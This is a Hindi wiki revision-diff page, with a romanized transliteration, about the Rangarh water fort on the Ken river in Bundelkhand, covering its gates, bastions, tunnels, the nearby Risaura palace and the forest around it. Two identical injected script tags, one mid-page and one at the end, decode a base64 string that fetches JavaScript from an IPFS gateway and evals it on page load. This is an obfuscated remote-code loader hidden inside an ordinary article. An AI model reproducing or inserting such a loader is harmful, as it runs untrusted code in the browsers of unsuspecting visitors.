Difference between revisions of "जलदुर्ग (रनगढ़)"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('रनगढ़ का '''जलदुर्ग''' बुन्देलखंड में केन नदी के मध्...' के साथ नया पन्ना बनाया)
 
m (Text replace - "दरवाजे" to "दरवाज़े")
 
(3 intermediate revisions by one other user not shown)
Line 1: Line 1:
 +
{{बहुविकल्प|बहुविकल्पी शब्द=जलदुर्ग|लेख का नाम=जलदुर्ग (बहुविकल्पी)}}
 
रनगढ़ का '''जलदुर्ग''' [[बुन्देलखंड]] में [[केन नदी]] के मध्य में स्थित है। इस दुर्ग को बनाने वाले कारीगरों ने इसे कुछ ऐसे बिंदु पर बनाया है कि वर्ष [[1992]] और [[2005]] की बाढ़ में जब पूरा बांदा डूब गया, तब भी यह दुर्ग पानी के प्रकोप से दूर ही रहा। रनगढ दुर्ग के एक तरफ़ छतरपुर है, तो दूसरी तरफ़ बांदा। छतरपुर का बारीखेरा और बांदा का मउगिरवाँ इस दुर्ग की सीमा रेखा का निर्धारण करते हैं। दो मंजिला यह क़िला [[बुंदेला]] राजाओं द्वारा बनवाया गया बताया जाता है।
 
रनगढ़ का '''जलदुर्ग''' [[बुन्देलखंड]] में [[केन नदी]] के मध्य में स्थित है। इस दुर्ग को बनाने वाले कारीगरों ने इसे कुछ ऐसे बिंदु पर बनाया है कि वर्ष [[1992]] और [[2005]] की बाढ़ में जब पूरा बांदा डूब गया, तब भी यह दुर्ग पानी के प्रकोप से दूर ही रहा। रनगढ दुर्ग के एक तरफ़ छतरपुर है, तो दूसरी तरफ़ बांदा। छतरपुर का बारीखेरा और बांदा का मउगिरवाँ इस दुर्ग की सीमा रेखा का निर्धारण करते हैं। दो मंजिला यह क़िला [[बुंदेला]] राजाओं द्वारा बनवाया गया बताया जाता है।
 
{{tocright}}
 
{{tocright}}
 
====स्थापत्य कला====
 
====स्थापत्य कला====
दुर्ग में प्रत्येक दिशा में तीन दरवाजे हैं। दरवाजे के ऊपर छोटी-छोटी दीवारें हैं, जिसमें छेद है, ताकि दीवार के पीछे से दूर से आते शत्रुओं पर निगाह रखी जा सके। क़िले में कुल पांच बुर्ज हैं और बुर्जों की दो रेखाएँ हैं। क़िले में स्थान-स्थान पर सुरंगें बनी हैं, ताकि आपात स्थिति में सुरक्षित निकला जा सके। क़िले का निर्माण नदी की चट्टानों को तराश कर किया गया है। क़िले से कुछ ही दूरी पर रिसौरा महल है। कहा जाता है कि एक बार रानी साहिबा नाराज होकर यहाँ गईं थीं और काफ़ी दिनों तक महल में रहीं। तभी से इस महल का नाम रिसौरा पड़ गया।
+
दुर्ग में प्रत्येक दिशा में तीन दरवाज़े हैं। दरवाज़े के ऊपर छोटी-छोटी दीवारें हैं, जिसमें छेद है, ताकि दीवार के पीछे से दूर से आते शत्रुओं पर निगाह रखी जा सके। क़िले में कुल पांच बुर्ज हैं और बुर्जों की दो रेखाएँ हैं। क़िले में स्थान-स्थान पर सुरंगें बनी हैं, ताकि आपात स्थिति में सुरक्षित निकला जा सके। क़िले का निर्माण नदी की चट्टानों को तराश कर किया गया है। क़िले से कुछ ही दूरी पर रिसौरा महल है। कहा जाता है कि एक बार रानी साहिबा नाराज होकर यहाँ गईं थीं और काफ़ी दिनों तक महल में रहीं। तभी से इस महल का नाम रिसौरा पड़ गया।
 
====जंगल की सघनता====
 
====जंगल की सघनता====
 
क़िले की तोपों की मारक क्षमता रिसौरा तक बताई जाती है। पहले इस क़िले के आस-पास करघई और [[बाँस]] आदि का जंगल था। जंगल की यह सघनता गावों तक फैली थी। इसी कारण यह क़िला दस्युओं की शरण स्थली के रूप में भी जाना जाता है। इस समय भी खनन माफिया यहाँ सकिय हैं। यहाँ चकमक पत्थर पर्याप्त मात्रा में मिलते हैं। भू-अभिलेखों में यह क़िला [[मध्य प्रदेश]] में अंकित है।
 
क़िले की तोपों की मारक क्षमता रिसौरा तक बताई जाती है। पहले इस क़िले के आस-पास करघई और [[बाँस]] आदि का जंगल था। जंगल की यह सघनता गावों तक फैली थी। इसी कारण यह क़िला दस्युओं की शरण स्थली के रूप में भी जाना जाता है। इस समय भी खनन माफिया यहाँ सकिय हैं। यहाँ चकमक पत्थर पर्याप्त मात्रा में मिलते हैं। भू-अभिलेखों में यह क़िला [[मध्य प्रदेश]] में अंकित है।
Line 12: Line 13:
 
*[http://in.jagran.yahoo.com/news/travel/general/16_36_453.html जलदुर्ग रनगढ़]
 
*[http://in.jagran.yahoo.com/news/travel/general/16_36_453.html जलदुर्ग रनगढ़]
 
==संबंधित लेख==
 
==संबंधित लेख==
{{भारत के दुर्ग}}
+
{{मध्य प्रदेश के ऐतिहासिक स्थान}}{{भारत के दुर्ग}}
[[Category:भारत के दुर्ग]][[Category:स्थापत्य कला]][[Category:ऐतिहासिक स्थल]][[Category:कला कोश]][[Category:पर्यटन कोश]][[Category:इतिहास कोश]][[Category:ऐतिहासिक स्थान कोश]]
+
[[Category:मध्य प्रदेश]][[Category:मध्य प्रदेश के ऐतिहासिक स्थान]][[Category:भारत के दुर्ग]][[Category:स्थापत्य कला]][[Category:ऐतिहासिक स्थल]][[Category:कला कोश]][[Category:पर्यटन कोश]][[Category:इतिहास कोश]][[Category:ऐतिहासिक स्थान कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 05:26, 10 December 2012

chitr:Disamb2.jpg jaladurg ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- jaladurg (bahuvikalpi)

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

ranagadh ka jaladurg bundelakhand mean ken nadi ke madhy mean sthit hai. is durg ko banane vale karigaroan ne ise kuchh aise biandu par banaya hai ki varsh 1992 aur 2005 ki badh mean jab poora baanda doob gaya, tab bhi yah durg pani ke prakop se door hi raha. ranagadh durg ke ek taraf chhatarapur hai, to doosari taraf baanda. chhatarapur ka barikhera aur baanda ka mugiravaan is durg ki sima rekha ka nirdharan karate haian. do manjila yah qila buandela rajaoan dvara banavaya gaya bataya jata hai.

sthapaty kala

durg mean pratyek disha mean tin daravaze haian. daravaze ke oopar chhoti-chhoti divarean haian, jisamean chhed hai, taki divar ke pichhe se door se ate shatruoan par nigah rakhi ja sake. qile mean kul paanch burj haian aur burjoan ki do rekhaean haian. qile mean sthan-sthan par surangean bani haian, taki apat sthiti mean surakshit nikala ja sake. qile ka nirman nadi ki chattanoan ko tarash kar kiya gaya hai. qile se kuchh hi doori par risaura mahal hai. kaha jata hai ki ek bar rani sahiba naraj hokar yahaan geean thian aur kafi dinoan tak mahal mean rahian. tabhi se is mahal ka nam risaura p d gaya.

jangal ki saghanata

qile ki topoan ki marak kshamata risaura tak bataee jati hai. pahale is qile ke as-pas karaghee aur baans adi ka jangal tha. jangal ki yah saghanata gavoan tak phaili thi. isi karan yah qila dasyuoan ki sharan sthali ke roop mean bhi jana jata hai. is samay bhi khanan maphiya yahaan sakiy haian. yahaan chakamak patthar paryapt matra mean milate haian. bhoo-abhilekhoan mean yah qila madhy pradesh mean aankit hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>